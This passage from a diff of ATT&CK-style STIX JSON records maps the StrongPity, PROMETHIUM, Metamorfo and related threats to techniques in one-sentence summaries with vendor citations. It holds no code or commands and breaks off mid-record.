"attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has used encrypted strings in its dropper component.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--5bddc9b3-eaa0-487b-9d62-25a2a5fbb11a", + "type": "relationship", + "modified": "2020-07-30T14:22:13.090Z", + "created": "2020-07-27T18:45:39.494Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can delete previously exfiltrated files from the compromised host.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--7dd11b5f-2f54-43a5-a2e1-9d33e24d89a0", + "type": "relationship", + "modified": "2020-07-28T17:25:25.674Z", + "created": "2020-07-27T18:45:39.501Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can download files to specified targets.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--c7cf767a-fa78-4ca7-9bd1-612d51d0c098", + "type": "relationship", + "modified": "2020-07-27T18:55:17.610Z", + "created": "2020-07-27T18:55:17.610Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "\n[StrongPity](https://attack.mitre.org/software/S0491) has used HTTPS over port 1402 in C2 communication.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--18714758-e6ea-4f61-87c9-6340c0001b9c", + "type": "relationship", + "modified": "2020-07-27T20:02:42.985Z", + "created": "2020-07-27T20:02:42.985Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--c1d36d2e-a8ab-4132-8690-e97628a07a0f", + "type": "relationship", + "modified": "2020-07-30T14:22:13.079Z", + "created": "2020-07-27T20:02:43.027Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used watering hole attacks to deliver malicious versions of legitimate installers.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--e898946c-2c9d-4bf4-9253-67acfadc5b0a", + "type": "relationship", + "modified": "2020-07-28T17:59:34.589Z", + "created": "2020-07-28T17:59:34.589Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used Registry run keys to establish persistence.(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--788d02cb-7a20-4115-9428-b55e598374ce", + "type": "relationship", + "modified": "2020-07-29T20:09:34.818Z", + "created": "2020-07-28T17:59:34.602Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has signed code with self-signed certificates.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--b2f7a2e7-5a72-4ace-b1de-121a8db809d8", + "type": "relationship", + "modified": "2020-10-15T01:57:09.315Z", + "created": "2020-07-28T17:59:34.605Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has disguised malicious installer files by bundling them with legitimate software installers.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--92348457-3761-4298-aedc-14fa7fd4810c", + "type": "relationship", + "modified": "2020-07-30T13:32:16.238Z", + "created": "2020-07-28T17:59:34.643Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--49be75c9-8484-492e-9ebc-f81d2e203e4e", + "type": "relationship", + "modified": "2020-07-30T18:52:23.949Z", + "created": "2020-07-28T17:59:34.649Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--b92d6b45-e211-4168-ac32-80427bf1b9d2", + "type": "relationship", + "modified": "2020-07-30T18:52:23.953Z", + "created": "2020-07-28T18:16:41.733Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created admin accounts on a compromised host.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--56e4bdb5-a57a-463a-a396-7bed2eb6893e", + "type": "relationship", + "modified": "2020-07-28T18:16:41.740Z", + "created": "2020-07-28T18:16:41.740Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + }, + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "description": "(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)", + "relationship_type": "uses", + "id": "relationship--bc4252e5-6a2a-443e-9a31-16d86f4f069b", + "type": "relationship", + "modified": "2020-07-28T18:20:56.624Z", + "created": "2020-07-28T18:20:56.624Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2", + "target_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "external_references": [ + { + "source_name": "TrendMicro POWERSTATS V3 June 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/", + "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020." + }, + { + "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "source_name": "Symantec MuddyWater Dec 2018" + } + ], + "description": "(Citation: TrendMicro POWERSTATS V3 June 2019)(Citation: Symantec MuddyWater Dec 2018)", + "relationship_type": "uses", + "id": "relationship--aa0e4bee-a9a4-4d32-bb62-f024058842c6", + "type": "relationship", + "modified": "2020-07-29T20:13:49.863Z", + "created": "2020-07-29T20:12:10.924Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "target_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "external_references": [ + { + "source_name": "US-CERT TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A" + } + ], + "description": "(Citation: US-CERT TA18-074A)", + "relationship_type": "uses", + "id": "relationship--8e4dd84f-e96f-4f5c-81aa-9827fd5abb06", + "type": "relationship", + "modified": "2020-07-29T20:19:10.618Z", + "created": "2020-07-29T20:19:10.618Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--a5b0b3ae-737a-4f2b-bbe9-23ca214eb733", + "type": "relationship", + "modified": "2020-07-30T18:52:23.956Z", + "created": "2020-07-30T13:32:16.170Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "external_references": [ + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has named services to appear legitimate.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--580254b6-1227-4c7d-a7b5-c4e7908e0acb", + "type": "relationship", + "modified": "2020-07-31T13:05:31.232Z", + "created": "2020-07-30T14:22:12.962Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) can enumerate all windows on the victim\u2019s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)", + "relationship_type": "uses", + "id": "relationship--ce071226-7abc-492c-918d-96cc195f928d", + "type": "relationship", + "modified": "2020-07-30T18:50:52.554Z", + "created": "2020-07-30T17:43:35.396Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has collected the hostname and Operating System version from the system.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)", + "relationship_type": "uses", + "id": "relationship--8a8afe63-a754-40e3-98af-cfc3f0aa6ef5", + "type": "relationship", + "modified": "2020-07-30T18:50:52.572Z", + "created": "2020-07-30T17:43:35.408Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) can collect screenshots of the victim\u2019s machine.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--b5d200f9-2b85-46c8-980a-0692e49ccdfc", + "type": "relationship", + "modified": "2020-07-30T17:43:35.421Z", + "created": "2020-07-30T17:43:35.421Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used VBS code on victims\u2019 systems.(Citation: FireEye Metamorfo Apr 2018)", + "relationship_type": "uses", + "id": "relationship--eed0e9c9-f849-4938-b243-5f6692d94b6b", + "type": "relationship", + "modified": "2020-09-23T19:29:10.225Z", + "created": "2020-07-30T17:43:35.432Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created new services and modified existing services for persistence.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--875a622a-445e-46fe-8959-8d205c88c728", + "type": "relationship", + "modified": "2020-07-30T18:52:23.886Z", + "created": "2020-07-30T18:52:23.886Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "external_references": [ + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) collects a list of installed antivirus software from the victim\u2019s system.(Citation: Fortinet Metamorfo Feb 2020) ", + "relationship_type": "uses", + "id": "relationship--0f5c39a8-edc1-4da2-941a-56e17b32abe4", + "type": "relationship", + "modified": "2020-10-21T22:48:31.315Z", + "created": "2020-07-30T19:23:33.942Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "external_references": [ + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has a command to launch a keylogger on the victim\u2019s machine.(Citation: Fortinet Metamorfo Feb 2020) ", + "relationship_type": "uses", + "id": "relationship--0c2259d0-2d56-4bbc-bd98-e35ac991b6e8", + "type": "relationship", + "modified": "2020-09-23T19:32:27.243Z", + "created": "2020-07-30T19:23:33.964Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "external_references": [ + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used VMProtect to pack and protect files.(Citation: Fortinet Metamorfo Feb 2020) ", + "relationship_type": "uses", + "id": "relationship--c9747fcc-b249-49cc-8f8b-aad9e89bdc31", + "type": "relationship", + "modified": "2020-07-30T19:23:33.967Z", + "created": "2020-07-30T19:23:33.967Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", + "external_references": [ + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has a function to receive data from the system clipboard.(Citation: Fortinet Metamorfo Feb 2020) ", + "relationship_type": "uses", + "id": "relationship--787f09c0-92fe-4208-96e8-86c8e45c9a40", + "type": "relationship", + "modified": "2020-07-30T19:23:33.986Z", + "created": "2020-07-30T19:23:33.986Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--bbcd7a02-ef24-4171-ac94-a93540173b94", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "source_name": "Prevx Carberp March 2011", + "url": "http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf", + "description": "Giuliani, M., 